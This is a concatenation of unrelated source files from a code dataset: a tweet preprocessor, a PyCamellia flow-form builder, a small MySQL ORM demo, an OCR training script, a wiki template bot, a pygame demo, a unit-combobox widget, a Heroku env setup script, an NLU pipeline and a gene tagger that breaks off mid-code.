# Remove single letter words and digits too.\n my_stopwords = stopwords.words('english') + ['amp'] + ['rt'] + ['https']\n\n clean_tweets = []\n if all_lowercase:\n print(\"---------- Removing stopwords (and digits) and lowercasing... ----------\")\n for i in range(0,N):\n clean_tweets.append([word.lower() for word in tweets[i] if((word.lower() not in my_stopwords) and (not any(character.isdigit() for character in word)) and (len(word) > 1) )])\n else:\n print(\"---------- Removing stopwords (and digits)... ----------\")\n for i in range(0,N):\n clean_tweets.append([word for word in tweets[i] if((word.lower() not in my_stopwords) and (not any(character.isdigit() for character in word)) and (len(word) > 1) )])\n\nelse:\n print(\"---------- NOT removing stopwords (and digits)... 
----------\")\n\n#--------------------------------------------------------\n# Stemming\n#--------------------------------------------------------\n# Uncomment the following lines to test different stemming algorithms:\n'''words = clean_tweets[0]\n\n# Porter works poorly on some words, e.g.: foolishly:foolishli, nothing:noth, little:littl\nfor word in words:\n print(word + \":\" + PorterStemmer().stem(word))\n\n# Snowball works poorly on some words, e.g.: nothing:noth, little:littl\nfor word in words:\n print(word + \":\" + SnowballStemmer(\"english\").stem(word))\n\n# Porter2 gives similar results to Snowball\nfor word in words:\n print(word + \":\" + stem(word))'''\n\nif stemming:\n print(\"---------- Stemming words... ----------\")\n # We will use Porter2:\n for i in range(0,N): # Loop over all clean_tweets\n j = 0\n for word in clean_tweets[i]:\n clean_tweets[i][j] = stem(word)\n j += 1\nelse:\n print(\"---------- NO STEMMING ----------\")\n\n#--------------------------------------------------------\n# Delete empty tweets\n#--------------------------------------------------------\nsifted_tweets = []\nfor tweet in clean_tweets:\n if tweet:\n sifted_tweets.append(tweet)\nprint('%s tweets left after preprocessing'%len(sifted_tweets))\n\n#--------------------------------------------------------\n# Save data\n#--------------------------------------------------------\nprint(\"---------- Saving sifted tweets... ----------\")\nwith open('data/clean_Trump_2018_tweets.json', 'w') as outfile:\n json.dump(sifted_tweets, outfile)\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"146256083","text":"from PyCamellia import *\nfrom string import *\nimport os\n\n#takes the inputs from the GUI and returns a formulation with all conditions attached\nclass FormCreator():\n def __init__(self):\n pass\n #@return\n #poly - an integer between 1 and 9\n #inflows - an array of spatial filters\n #x_vels - an array of Functions for the x velocities mapping to inflows of the same array index\n #y_vels - an array of Functions for the y velocities mapping to inflows of the same array index\n #outflows - an array of spatial filters\n #dims - the dimensions of the mesh; a list of doubles of length 2\n #elems - a list of ints; the elements in the mesh\n #re - Reynolds number, a double, optional argument\n #transient - Boolean, whether or not the function is transient\n def main(self, poly, inflows, x_vels, y_vels, outflows, dims, elems, re=None, transient=False):\n delta_k = 1 \n space_dim = 2\n mesh = self.makeMesh(dims, elems)\n\n #for Navier\n if re != None:\n form = NavierStokesVGPFormulation(mesh, re, poly, delta_k)\n \n #for Stokes\n else:\n #self.context.setNav(False)\n use_conforming_traces = True\n mu = 1.0\n form = StokesVGPFormulation(space_dim, use_conforming_traces, mu, transient)\n form.initializeSolution(mesh, poly, delta_k)\n \n form.addZeroMeanPressureCondition()\n\n #adding conditions\n inflow = self.add_inflow_conditions(form, transient, inflows, x_vels, y_vels)\n outflow = self.add_outflow_conditions(form, outflows)\n #self.add_conditions(\"wall\", form, transient)\n form.addWallCondition(self.implicit_walls(dims, inflow, outflow))\n \n \n return form\n\n \n\n\n \n #if not loading from a file make a new mesh Topology\n #if not self.context.loaded:\n def makeMesh(self, dims, elems):\n x0 = [0., 0.]\n return MeshFactory.rectilinearMeshTopology(dims, elems, x0)\n \n\n\n \n\n\n #adds inflow conditions to the form\n def add_inflow_conditions(self, form, transient, inflows, x_vels, y_vels):\n total_boundary = SpatialFilter.negatedFilter(SpatialFilter.allSpace())\n for x in range(0, len(inflows)):\n velocity = self.get_velocity(transient, form, x_vels[x], y_vels[x])\n form.addInflowCondition(inflows[x], velocity)\n total_boundary = SpatialFilter.unionFilter(total_boundary, inflows[x])\n return total_boundary\n\n #adds outflow conditions to the form\n def add_outflow_conditions(self, form, outflows):\n total_boundary = SpatialFilter.negatedFilter(SpatialFilter.allSpace())\n for boundary in outflows:\n form.addOutflowCondition(boundary)\n total_boundary = SpatialFilter.unionFilter(total_boundary, boundary)\n return total_boundary\n\n #adds wall conditions on every part of the perimeter that is not an inflow or outflow\n def implicit_walls(self, dimensions, inflow, outflow):\n flows = SpatialFilter.unionFilter(inflow, outflow)\n wallConditions = SpatialFilter.negatedFilter(flows)\n return wallConditions\n\n #prototype\n def get_velocity(self, transient, form, x_vel, y_vel):\n topVelocity = Function.vectorize(x_vel, y_vel)\n if transient:\n timeRamp = TimeRamp.timeRamp(form.getTimeFunction(),1.0)\n topVelocity = topVelocity*timeRamp\n return topVelocity\n \n \n #takes a string and returns a spatial filter\n #unused for phase 3\n def get_space_fil(self, prompt):\n answer = self.context.query(prompt)\n altered = answer.lower()\n altered = altered.translate(None, whitespace)#remove whitespace\n try:\n \tif altered.find(\",\") > -1: #if there are multiple spatial filters\n \t halves = altered.split(\",\")#split them\n \t filter1 = 
self.get_space_fil_helper(halves[0],prompt)\n \t filter2 = self.get_space_fil_helper(halves[1],prompt)\n \t return SpatialFilter.intersectionFilter(filter1, filter2)\n \telse:\n \t\treturn self.get_space_fil_helper(altered, prompt)\n except ValueError:\n \tself.context.parse_error(answer)\n \tself.get_space_fil(prompt)\n\n\n #space_fil's helper method\n def get_space_fil_helper(self, assignment, prompt):\n is_x = assignment.find(\"x\") > -1\n if not is_x:\n if assignment.find(\"y\") == -1:\n self.context.parse_error(assignment)\n return self.get_space_fil(prompt)\n #error here\n if assignment.find(\"=\") > -1:\n if is_x:\n return SpatialFilter.matchingX(float(assignment.translate(None, \"x=\")))\n else:\n return SpatialFilter.matchingY(float(assignment.translate(None, \"y=\")))\n elif assignment.find(\">\") > -1:\n if is_x:\n return SpatialFilter.greaterThanX(float(assignment.translate(None, \"x>\")))\n else:\n return SpatialFilter.greaterThanY(float(assignment.translate(None, \"y>\")))\n elif assignment.find(\"<\") > -1:\n if is_x:\n return SpatialFilter.lessThanX(float(assignment.translate(None, \"x<\")))\n else:\n return SpatialFilter.lessThanY(float(assignment.translate(None, \"y<\")))\n else:\n self.context.parse_error(assignment)\n answer = self.context.query(\"Please input spatial filter in form x=3, y< 4\")\n return self.get_space_fil_helper(answer, prompt)\n","sub_path":"program/FormCreator.py","file_name":"FormCreator.py","file_ext":"py","file_size_in_byte":5615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"60903768","text":"# Author:Cecilia\n\nfrom orm import mysql_contorl\n\n\n\n# Field class: the parent class of all field classes\nclass Fields:\n def __init__(self,name,column_type,primary_key,default):\n self.name = name\n self.column_type = column_type\n self.primary_key = primary_key\n self.default = default\n\n\n# Integer field class\nclass Integer(Fields):\n def __init__(self,name,column_type='int',primary_key=False,default=0):\n super().__init__(name,column_type,primary_key,default)\n\n\n# String field class\nclass String(Fields):\n def __init__(self, name, column_type='varchar(250)', primary_key=False, default=None):\n super().__init__(name, column_type, primary_key, default)\n\n\n\n\n\n\n# Metaclass that controls how table classes are created\nclass MyMetaclass(type):\n def __new__(cls, class_name,class_base,class_attr):\n if class_name == 'Models':\n return type.__new__(cls, class_name,class_base,class_attr)\n\n table_name = class_attr.get('table_name',class_name)\n mappings = {}\n primary_key = None\n\n for k,v in class_attr.items():\n if isinstance(v,Fields):\n mappings[k] = v\n if v.primary_key:\n if primary_key:\n raise TypeError('A table can only have one primary key!')\n else:\n primary_key = v.name\n\n if not primary_key:\n raise TypeError('A table must have a primary key!')\n\n for k in mappings.keys():\n class_attr.pop(k)\n\n class_attr['table_name'] = table_name\n class_attr['primary_key'] = primary_key\n class_attr['mappings'] = mappings\n return type.__new__(cls, class_name, class_base, class_attr)\n\n\n\n# Parent class of all table classes; by inheriting from dict, values can be read and assigned with dot notation\nclass Models(dict,metaclass=MyMetaclass):\n def __init__(self,**kwargs):\n super().__init__(**kwargs)\n\n\n # Triggered when assigning an attribute with dot notation\n def __setattr__(self, key, value):\n self[key] = value\n\n # Triggered when reading an attribute with dot notation\n def __getattr__(self, item):\n return self.get(item)\n\n\n\n # Bound classmethod: callable on the class directly, or on an instance, without passing the first argument explicitly\n @classmethod\n def select(cls,**kwargs):\n mysql_obj = mysql_contorl.MySQL()\n if not kwargs:\n sql = 'select * from %s' %cls.table_name\n res = mysql_obj.select(sql)\n else:\n key = list(kwargs.keys())[0]\n value = kwargs.get(key)\n sql = 'select * from %s where %s=?'%(cls.table_name,key)\n sql = sql.replace('?','%s')\n res = mysql_obj.select(sql,value)\n return [cls(**r) for r in res]\n\n\n # Insert a row into the database\n def save(self):\n mysql_obj = mysql_contorl.MySQL()\n\n # insert into table() values()\n\n keys=[]\n values=[]\n replace = []\n for k,v in self.mappings.items():\n keys.append(k)\n values.append(getattr(self,v.name,v.default))\n replace.append('?')\n\n sql = 'insert into %s(%s) values(%s)'%(self.table_name,','.join(keys),','.join(replace))\n sql = sql.replace('?','%s')\n mysql_obj.execute(sql,values)\n\n\n # Update a row in the database\n def sql_update(self):\n mysql_obj = mysql_contorl.MySQL()\n\n keys = []\n primary_key = None\n values = []\n for k,v in self.mappings.items():\n if v.primary_key:\n primary_key = getattr(self,v.name,v.default)\n else:\n keys.append(v.name+'=?')\n values.append(getattr(self,v.name,v.default))\n\n sql = 'update %s set %s where %s=%s' %(self.table_name,','.join(keys),self.primary_key,primary_key)\n sql = sql.replace('?','%s')\n mysql_obj.execute(sql,values)\n\n\n\n\n","sub_path":"youku_server/orm/orm_demo.py","file_name":"orm_demo.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"126571277","text":"from tool.config import Cfg\nfrom model.trainer import Trainer\nimport os\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\n\n\ndef main(model_name, checkpoint_name, url):\n config = Cfg.load_config_from_name(model_name)\n dataset_params = {\n 'name': 'hw',\n 'data_root': '/home/longhn',\n # 'train_root': '/home/fdm/Desktop/chungnph/vietocr/Annotation_2505',\n # 'val_root': '/home/fdm/Desktop/chungnph/vietocr/Annotation_2505',\n 'train_annotation': f'{url}/train.txt',\n 'valid_annotation': f'{url}/valid.txt'\n }\n\n params = {\n 'print_every': 200,\n 'valid_every': 10*200,\n 'iters': 30000,\n 'checkpoint': f'./checkpoint/{checkpoint_name}.pth',\n 'export': f'./checkpoint/{checkpoint_name}.pth',\n 'metrics': 15000,\n 'batch_size': 32\n }\n dataloader_params = {\n 'num_workers': 1\n }\n # config['pretrain']['cached'] = 'checkpoint/ngaycap_0204.pth'\n config['trainer'].update(params)\n config['dataset'].update(dataset_params)\n config['dataloader'].update(dataloader_params)\n config['device'] = 'cuda'\n config['vocab'] = '''aAàÀảẢãÃáÁạẠăĂằẰẳẲẵẴắẮặẶâÂầẦẩẨẫẪấẤậẬbBcCdDđĐeEèÈẻẺẽẼéÉẹẸêÊềỀểỂễỄếẾệỆfFgGhHiIìÌỉỈĩĨíÍịỊjJkKlLmMnNoOòÒỏỎõÕóÓọỌôÔồỒổỔỗỖốỐộỘơƠờỜởỞỡỠớỚợỢpPqQrRsStTuUùÙủỦũŨúÚụỤưƯừỪửỬữỮứỨựỰvVwWxXyYỳỲỷỶỹỸýÝỵỴzZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ '''\n # config['weights'] = 'checkpoint/ngaycap_0204.pth'\n print(config)\n trainer = Trainer(config, pretrained=True)\n trainer.config.save(f'train_config/{checkpoint_name}.yml')\n trainer.train()\n\n\n# main(config file, model name, path to the training folder)\nmain('vgg_seq2seq', 'seq2seq_handwriting_0207_pretrain_32_2k', '/home/longhn/handwriting_0207')\n# Address:\n# iter: 1000000 - valid loss: 0.721 - acc full seq: 0.8174 - acc per char: 0.9423\n\n\n","sub_path":"handwriting_draft_train.py","file_name":"handwriting_draft_train.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"253980786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pywikibot, re, sys, argparse\n\nimport blib\nfrom blib import getparam, rmparam, msg, site, tname\n\nfrom form_of_templates import (\n language_specific_alt_form_of_templates,\n alt_form_of_templates,\n language_specific_form_of_templates,\n form_of_templates\n)\n\ntemplates_to_process = form_of_templates + alt_form_of_templates + (\n language_specific_form_of_templates + language_specific_alt_form_of_templates\n)\n\ndef process_page(page, index, parsed):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n pagemsg(\"Processing\")\n notes = []\n\n for t in parsed.filter_templates():\n origt = str(t)\n tn = tname(t)\n if tn == \"#invoke:form of/templates\" and getparam(t, \"1\") == \"template_tags\":\n t.add(\"1\", \"tagged_form_of_t\")\n notes.append(\"Rewrite {{#invoke:form of/templates|template_tags}} with {{#invoke:form of/templates|tagged_form_of_t}}\")\n if tn == \"#invoke:form of\" and getparam(t, \"1\") in [\"form_of_t\", \"alt_form_of_t\"]:\n ignorelist = blib.fetch_param_chain(t, \"ignorelist\", \"ignorelist\")\n if ignorelist:\n ignore = blib.fetch_param_chain(t, \"ignore\", \"ignore\")\n for il in ignorelist:\n ignore.append(il + \":list\")\n blib.set_param_chain(t, ignore, \"ignore\", \"ignore\", before=\"ignorelist\")\n blib.remove_param_chain(t, \"ignorelist\", \"ignorelist\")\n blib.set_template_name(t, \"#invoke:form of/templates\")\n notes.append(\"Rewrite {{#invoke:form of|%s}} with {{#invoke:form of/templates|form_of_t}}\" % getparam(t, \"1\"))\n if tn == \"#invoke:form of\" and getparam(t, \"1\") == \"alt_form_of_t\":\n t.add(\"2\", getparam(t, \"text\"), before=\"text\")\n rmparam(t, \"text\")\n if t.has(\"nocap\"):\n rmparam(t, \"nocap\")\n else:\n t.add(\"withcap\", \"1\")\n if t.has(\"nodot\"):\n rmparam(t, \"nodot\")\n else:\n t.add(\"withdot\", \"1\")\n t.add(\"1\", \"form_of_t\")\n\n if str(t) != origt:\n pagemsg(\"Replaced <%s> with <%s>\" % (origt, str(t)))\n\n return str(parsed), notes\n\nparser = blib.create_argparser(\"Convert form_of_t and alt_form_of_t invocations in [[Module:form of]] to form_of_t in [[Module:form of/templates]]\")\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nfor i, template in blib.iter_items(templates_to_process, start, end):\n page = pywikibot.Page(site, \"Template:%s\" % template)\n blib.do_edit(page, i, process_page, save=args.save, verbose=args.verbose)\n","sub_path":"rewrite_form_of_templates.py","file_name":"rewrite_form_of_templates.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"186824464","text":"# 03box.py\n# First drawing exercises in pygame, draws a box\n# 2014-04-30\tPV\n\nimport pygame\nimport random\n\ndef map(value, min_in, max_in, min_out, max_out):\n\treturn int(0.5+(value-min_in)/(max_in-min_in)*(max_out-min_out)+min_out)\n\ndef dot(x,y):\n\tglobal x0, y0, side\n\tglobal window, res, width, height\n\tx2 = map(x,0,255,x0,x0+side)\n\ty2 = map(y,0,255,y0,y0+side)\n\tpygame.draw.circle(window, pygame.Color(255,128,0), [x2, y2], 6, 0)\n\tpygame.display.update()\n\ndef setup():\n\tglobal window, res, width, height\n\tpygame.init()\n\tres = (1920, 1080)\n\twidth, height = res\n\twindow = pygame.display.set_mode(res, pygame.FULLSCREEN)\n\t#window.fill(pygame.Color(255,255,255))\n\n\tglobal x0, y0, side\n\tside = height-20\n\tx0 = int(width/2-side/2)\n\ty0 = 10\n\tpygame.draw.rect(window, pygame.Color(0,255,0), [x0,y0,side,side], 3)\n\tpygame.draw.line(window, pygame.Color(0,255,0), [x0+side/2,y0], [x0+side/2,y0+side], 1)\n\tpygame.draw.line(window, pygame.Color(0,255,0), [x0,y0+side/2], [x0+side,y0+side/2], 1)\n\ndef display():\n\tdot(0,0)\n\tdot(0,255)\n\tdot(255,0)\n\tdot(255,255)\n\tdot(64,64)\n\tdot(128,128)\n\tdot(192,192)\n\nif __name__=='__main__':\n\tsetup()\n\tdisplay()\n\trunning = True\n\twhile running:\n\t\t#loop()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==pygame.KEYDOWN:\n\t\t\t\trunning = False\n\t\t\t\tbreak\n\tpygame.quit()\n\n","sub_path":"pygame/03box.py","file_name":"03box.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"34097921","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Labeled combobox widget with units.\n\nThe goal of these widgets is twofold: to make it easier for developers\nto implement dialogs with compound widgets, and to naturally\nstandardize the user interface presented to the user.\n\"\"\"\n\nimport logging\nfrom seamm_util import Q_, units_class, default_units\nimport seamm_widgets as sw\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nlogger = logging.getLogger(__name__)\n\noptions = {\n \"unitcombobox\": {\n \"as_quantity\": \"as_quantity\",\n },\n \"units\": {\n \"class_\": \"class_\",\n \"cursor\": \"cursor\",\n \"exportselection\": \"exportselection\",\n \"unitsheight\": \"height\",\n \"unitsjustify\": \"justify\",\n \"postcommand\": \"postcommand\",\n \"style\": \"style\",\n \"unitstakefocus\": \"takefocus\",\n \"variable\": \"textvariable\",\n \"unitsvalidate\": \"validate\",\n \"unitsvalidatecommand\": \"validatecommand\",\n \"unitswidth\": \"width\",\n \"unitsxscrollcommand\": \"xscrollcommand\",\n },\n}\n\n\nclass UnitCombobox(sw.LabeledCombobox):\n def __init__(self, parent, *args, **kwargs):\n \"\"\"Initialize the instance\"\"\"\n class_ = kwargs.pop(\"class_\", \"MUnitCombobox\")\n super().__init__(parent, class_=class_)\n\n interior = self.interior\n\n # unitcombobox options\n self.as_quantity = kwargs.pop(\"as_quantity\", False)\n\n # units combobox\n unitsheight = kwargs.pop(\"unitsheight\", 7)\n unitswidth = kwargs.pop(\"unitswidth\", 10)\n unitsstate = kwargs.pop(\"unitsstate\", \"readonly\")\n\n self.units = ttk.Combobox(\n interior, height=unitsheight, width=unitswidth, state=unitsstate\n )\n self.units.grid(row=0, column=0, sticky=tk.EW)\n\n # interior frame\n self.interior = ttk.Frame(interior)\n self.interior.grid(row=0, column=1, sticky=tk.NSEW)\n\n self.config(**kwargs)\n\n @property\n def value(self):\n return self.get()\n\n @value.setter\n def value(self, value):\n self.set(value)\n\n def show(self, *args):\n \"\"\"Show only the specified subwidgets.\n 'all' or no arguments reverts to showing all\"\"\"\n\n super().show(*args)\n\n show_all = len(args) == 0 or args[0] == \"all\"\n\n if show_all or \"units\" in args:\n self.units.grid(row=0, column=0, sticky=tk.W)\n else:\n self.units.grid_forget()\n\n def set(self, value, unit_string=None):\n \"\"\"Set the the value and units\"\"\"\n\n if value is None:\n return\n\n # the value may have units or be a plain value\n if isinstance(value, units_class):\n self.combobox.set(value.magnitude)\n\n dimensionality = value.dimensionality\n current_units = self.units.cget(\"values\")\n if len(current_units) > 0:\n for unit in current_units:\n if unit != \"\":\n if Q_(unit).dimensionality != dimensionality:\n self.units.configure(values=[])\n current_units = []\n break\n\n if len(current_units) == 0:\n self.set_units([*default_units(str(dimensionality)), \"\"])\n self.units.set(\"{0.units:~}\".format(value).replace(\" \", \"\"))\n elif unit_string is not None:\n self.combobox.set(value)\n\n dimensionality = Q_(unit_string).dimensionality\n current_units = self.units.cget(\"values\")\n if len(current_units) > 0:\n for unit in current_units:\n if unit != \"\":\n if Q_(unit).dimensionality != dimensionality:\n self.units.configure(values=[])\n current_units = []\n break\n\n if len(current_units) == 0:\n self.set_units([*default_units(str(dimensionality)), \"\"])\n self.units.set(unit_string)\n else:\n self.combobox.set(value)\n self.set_units(\"all\")\n self.units.set(\"\")\n\n def get(self):\n \"\"\"return the current 
value with units\"\"\"\n value = self.combobox.get()\n if value in self.combobox.cget(\"values\"):\n return value\n else:\n unit = self.units.get()\n if unit == \"\":\n return value\n elif self.as_quantity:\n try:\n magnitude = float(value)\n return Q_(magnitude, unit)\n except Exception:\n return (value, unit)\n else:\n return (value, unit)\n\n def set_units(self, values=None):\n if values is None:\n dimensionality = str(self.get().dimensionality)\n self.units.config(values=[*default_units(dimensionality), \"\"])\n elif values == \"all\":\n self.units.config(values=[*default_units(\"all\"), \"\"])\n else:\n self.units.config(values=values)\n\n def config(self, **kwargs):\n \"\"\"Set the configuration of the megawidget\"\"\"\n unitcombobox = options[\"unitcombobox\"]\n units = options[\"units\"]\n\n # cannot modify kwargs while iterating over it...\n keys = [*kwargs.keys()]\n for k in keys:\n if k in unitcombobox and unitcombobox[k] in self.__dict__:\n v = kwargs.pop(k)\n self.__dict__[unitcombobox[k]] = v\n elif k in units:\n v = kwargs.pop(k)\n self.units.config(**{units[k]: v})\n\n # having removed our options, pass rest to parent\n super().config(**kwargs)\n","sub_path":"seamm_widgets/unit_combobox.py","file_name":"unit_combobox.py","file_ext":"py","file_size_in_byte":5659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
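The `get`/`set` logic above hinges on quantity objects that carry a magnitude, units, and a dimensionality. Assuming `seamm_util`'s `Q_` wraps a pint registry (as the `{:~}` short-form unit formatting suggests), the behaviour can be sketched with pint directly:

```python
# Sketch of the quantity handling get() and set() rely on, using pint
# directly (assumption: seamm_util's Q_ wraps a pint unit registry).
import pint

ureg = pint.UnitRegistry()
Q_ = ureg.Quantity

q = Q_(2.5, "nanometer")
print(q.magnitude)             # 2.5
print(q.dimensionality)        # [length]
print("{:~}".format(q.units))  # short unit form, e.g. 'nm'

# Dimensionality comparison is how set() decides whether the current
# unit list is still valid for a new value:
assert Q_("1 angstrom").dimensionality == q.dimensionality
```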
+{"seq_id":"421248894","text":"numners = [8, 1, 2, 2, 3]\ny = sorted(numners)\n\nres = []\nresult = {}\nfor index, num in enumerate(y):\n if num not in result:\n result[num] = index\nfor i in numners:\n res.append(result[i])\nprint(res)\n","sub_path":"Easy/smallerNumThanCurrNumber.py","file_name":"smallerNumThanCurrNumber.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"165862014","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def sortList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head or head.next==None:\n return head\n \n temp=head\n slow=head\n fast=head\n \n while fast!=None and fast.next!=None:\n temp=slow\n slow=slow.next\n fast=fast.next.next\n \n temp.next=None \n left=self.sortList(head)\n right=self.sortList(slow)\n #head=start of first list\n #temp= end of first list\n #slow=start of second list\n #fast= end of second list\n \n return self.merge(left, right)\n \n def merge(self,l1, l2):\n sortedTemp=ListNode(0)\n curr=sortedTemp #l1 =left siide list, l2=right side list\n \n while (l1!=None and l2!=None):\n if l1.val detect intent: preference')\r\n tokenized, info = self.tokenizer.parse_sentence(sentence)\r\n prin('> tokenized: ' + str(tokenized))\r\n prin('> info:', info)\r\n info['ratings']=info['rate']\r\n data = self.sa.parse_sentence(tokenized, info)\r\n self._process_genres(data)\r\n prin('> data:', data)\r\n return {'intent': 'recommendation', 'data': data}\r\n elif res == 1:\r\n # factoid\r\n prin('> detect intent: factoid')\r\n data = self.query.parse(tokenize(sentence))\r\n prin('> data:', data)\r\n return {'intent': 'factoid', 'data': data}\r\n else:\r\n # query\r\n prin('> detect intent: query')\r\n tokenized, info = self.tokenizer.parse_sentence(sentence)\r\n prin('> tokenized: ', tokenized)\r\n prin('> info:', info)\r\n info['ratings']=info['rate']\r\n data = {\r\n 'like': info,\r\n 'dislike': {'person': [], 'year': [], 'genre': [], 'ratings': [], 'time': [], 'movie': []}\r\n }\r\n self._process_genres(data)\r\n return {'intent': 'recommendation', 'data': data}\r\n\r\nif __name__ == '__main__':\r\n mod = nlu_subsystem()\r\n q = input('> Input: ')\r\n while q != 'q':\r\n mod.process_sentence(q, log=True)\r\n q = input('> Input: ')","sub_path":"nlu_pipeline.py","file_name":"nlu_pipeline.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"29614476","text":"# coding=utf-8\n\"\"\" This module contains the essential to purge system response. Also\n autodiscover and publish to the system any class that comply this requisites:\n\n+ Is a subclass of BasePurge\n+ Is in a module inside this package\n\nThe purges classes are published in a dictionary ordered by short name. The\ndictionary is called purges_by_name\n\"\"\"\n\nfrom pkgutil import iter_modules\nfrom .basepurge import BasePurge\n\npurges_by_name = dict()\n\nfor element, name, is_package in \\\n iter_modules(path=__path__, prefix=__name__+\".\"):\n module = element.find_module(name).load_module(name)\n for class_name in dir(module):\n purge_class = getattr(module, class_name)\n # duck typing\n if hasattr(purge_class, \"purge_mention\")\\\n and hasattr(purge_class, \"purge_entity\") \\\n and hasattr(purge_class, \"short_name\") \\\n and callable(purge_class.purge_mention)\\\n and callable(purge_class.purge_entity)\\\n and purge_class.short_name != \"base\":\n purges_by_name[purge_class.short_name] = purge_class\n\nall_purges = purges_by_name.keys()\n","sub_path":"corefgraph/multisieve/purges/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"280113521","text":"'''\nCreated on 17 Feb 2021\n\n@author: thomasgumbricht\n'''\n\n# Standard library imports\n\n# Third party imports\n\nimport numpy as np\n \n# Package application imports\n\nfrom geoimagine.ktnumba import InterpolateLinearNaNNumba\n\nclass TimeSeriesNumba:\n ''' translator between Time Series and Numba \n '''\n \n def __init__(self):\n '''Empty call to access the functions\n '''\n pass\n \n def _FillAlongAxis(self, ts, validfraction=0.5):\n '''Linear interpolation of NaN, calls Numba function\n '''\n \n if np.all(np.isnan(ts)):\n \n return self.dstNullDarr[self.activeComp]\n \n if np.isnan(np.sum(ts)):\n \n #non_nans = (~np.isnan(ts)).sum()\n non_nans = np.count_nonzero(~np.isnan(ts))\n \n nans = np.count_nonzero(np.isnan(ts))\n \n if float(non_nans)/ts.shape[0] < validfraction:\n \n return self.dstNullDarr[self.activeComp]\n \n avg = np.nanmean(ts)\n \n if np.isnan(ts[0]):\n \n ts[0] = avg\n \n if np.isnan(ts[ts.shape[0]-1]):\n \n ts[ts.shape[0]-1] = avg\n \n ts = InterpolateLinearNaNNumba(ts)\n \n return ts\n \n else:\n \n return ts","sub_path":"numbautil.py","file_name":"numbautil.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"449159206","text":"#!/usr/bin/env python3\nimport os\nimport sys\nfrom config.app_config import BaseConfig\n\n\ndef env_vars():\n env_file = BaseConfig.ENV_FILE\n declarations = \"\"\n\n if not os.path.exists(env_file):\n print(\"Hey, you need a .env file.\", file=sys.stderr)\n sys.exit(1)\n\n with open(env_file, 'r') as env:\n for line in env.readlines():\n declarations += line.rstrip() + ' '\n\n return declarations\n\n\ndef set_heroku_config(declarations):\n os.system(f\"heroku config:set {declarations}\")\n\n\ndef main():\n declarations = env_vars()\n set_heroku_config(declarations)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/setup_heroku.py","file_name":"setup_heroku.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"181609679","text":"#Ning\r\n#14 October 2019\r\n#Linguistics TP3\r\n\r\ndef simple_gene_tagger(counts_file, dev_file):\r\n\r\n emissions_gene = {}\r\n emissions_nogene = {}\r\n counts = {}\r\n\r\n with open(counts_file, \"r\") as fp:\r\n for line in fp:\r\n segment = line.split()\r\n\r\n if(segment[1]==\"WORDTAG\"): #doing WORDTAG section\r\n\r\n if(segment[2] == \"GENE\"):\r\n emissions_gene[segment[3]] = float(segment[0]) #hash the word and the tag counts\r\n\r\n elif(segment[2] == \"NOGENE\"):\r\n emissions_nogene[segment[3]] = float(segment[0])\r\n\r\n elif(segment[1]==\"1-GRAM\"): #doing 1-GRAM section\r\n counts[segment[2]] = float(segment[0])\r\n\r\n else: #we're not doing anything beyond 1-GRAM\r\n break\r\n\r\n #read dev file and tag\r\n tags = []\r\n with open(dev_file, \"r\") as devfp:\r\n\r\n for line in devfp:\r\n line = line.split(\"\\n\")\r\n line = line[0]\r\n if(len(line)>0): #not an empty line\r\n\r\n #do the emission probability here\r\n if(line in emissions_gene and line in emissions_nogene): #has both tags, find more likely\r\n gene_prob = emissions_gene[line]/counts[\"GENE\"]\r\n nogene_prob = emissions_nogene[line]/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n elif(line in emissions_gene):\r\n gene_prob = emissions_gene[line]/counts[\"GENE\"]\r\n nogene_prob = 0/counts[\"NOGENE\"]\r\n\r\n choice = max(gene_prob, nogene_prob)\r\n\r\n if(choice == gene_prob):\r\n tags.append(line+\" \"+\"GENE\"+\"\\n\")\r\n elif(choice == nogene_prob):\r\n tags.append(line+\" \"+\"NOGENE\"+\"\\n\")\r\n\r\n elif(line in emissions_nogene):\r\n gene_prob = 